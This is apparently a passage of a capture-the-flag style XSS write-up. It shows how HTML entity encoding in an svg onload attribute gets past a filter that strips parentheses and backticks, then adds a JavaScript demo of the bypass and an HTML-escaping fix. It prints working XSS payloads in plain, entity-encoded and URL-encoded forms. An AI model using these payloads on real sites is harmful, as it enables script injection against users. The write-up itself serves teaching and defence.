Here we have a clear sink, will.innerHTML, but alert(1337) can't be called directly because the filter removes the characters ()`. The filter forgets, however, that attribute values are HTML entity decoded by the parser, so we simply entity-encode the payload: the filter sees no parentheses in the raw string, and the browser decodes &#x28; and &#x29; back into ( and ) when it reads the onload attribute. Additionally we URL encode the payload because it contains URL-unsafe characters such as & and #.
<!-- URL Encoding + HTML Entity Encoding -->
%3Csvg%20onload%3D%22%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x33%3B%26%23x33%3B%26%23x37%3B%26%23x29%3B%22%3E
<!-- HTML Entity Encoding -->
<svg onload="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x33;&#x33;&#x37;&#x29;">
<!-- No Encoding -->
<svg onload="alert(1337)">
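The bypass above, as an added example in JavaScript that is not part of the original writeup or of the challenge code: stripFilter() is an assumed model of the challenge filter (it drops the three characters the text names), decodeAttributeValue() models only the numeric-character-reference part of the HTML parser's attribute decoding, and escapeHtml() is the fix for the case where the input was only ever meant to be text. It builds the three payload forms, runs each through the modelled filter, and shows what the parser would hand to the onload handler.

```javascript
// Added example, not from the original writeup. Models a filter that strips
// "(", ")" and "`" from the raw string before it reaches innerHTML, and shows
// why HTML entity encoding inside an attribute value defeats it.

const PAYLOAD = 'alert(1337)';

// Assumed model of the challenge filter: removes "(", ")" and "`" characters.
function stripFilter(input) {
  return input.replace(/[()`]/g, '');
}

// Encodes every character as a hex numeric character reference (&#xHH;),
// uppercase hex so the output matches the writeup's payload byte for byte.
function htmlEntityEncode(s) {
  return Array.from(s, (c) => `&#x${c.codePointAt(0).toString(16).toUpperCase()};`).join('');
}

// Models the parser's attribute-value decoding for numeric character
// references only (hex and decimal); named references are out of scope here.
function decodeAttributeValue(v) {
  return v.replace(/&#x([0-9a-f]+);|&#([0-9]+);/gi, (m, hex, dec) =>
    String.fromCodePoint(hex ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// Builds the same three forms the writeup lists: raw, entity encoded, and
// entity encoded then URL encoded for transport in a query string.
function buildPayloads() {
  const plain = `<svg onload="${PAYLOAD}">`;
  const entityEncoded = `<svg onload="${htmlEntityEncode(PAYLOAD)}">`;
  return { plain, entityEncoded, urlEncoded: encodeURIComponent(entityEncoded) };
}

// Runs markup through the filter, then pulls out the onload attribute and
// decodes it the way the parser would when building the DOM. Returns null
// when no onload attribute survives.
function handlerAfterFilter(markup) {
  const filtered = stripFilter(markup);
  const m = /onload="([^"]*)"/.exec(filtered);
  return m ? decodeAttributeValue(m[1]) : null;
}

// The fix for a text context: escape the HTML metacharacters instead of
// blacklisting JavaScript syntax. "&" becomes "&amp;", so "&#x28;" renders
// literally and no attribute or tag is ever created.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const payloads = buildPayloads();
console.log('URL encoded payload:', payloads.urlEncoded);
console.log('plain after filter  ->', handlerAfterFilter(payloads.plain));         // alert1337
console.log('encoded after filter->', handlerAfterFilter(payloads.entityEncoded)); // alert(1337)
console.log('escaped, no handler ->', handlerAfterFilter(escapeHtml(payloads.entityEncoded))); // null
```

Run with `node`. The point the output makes is that the filter and the parser operate on different representations: the filter inspects the string before character references are resolved, the browser resolves them afterwards, so any blacklist applied to raw markup can be sidestepped by encoding. Escaping for the output context (or sanitising a parsed DOM) does not have that gap.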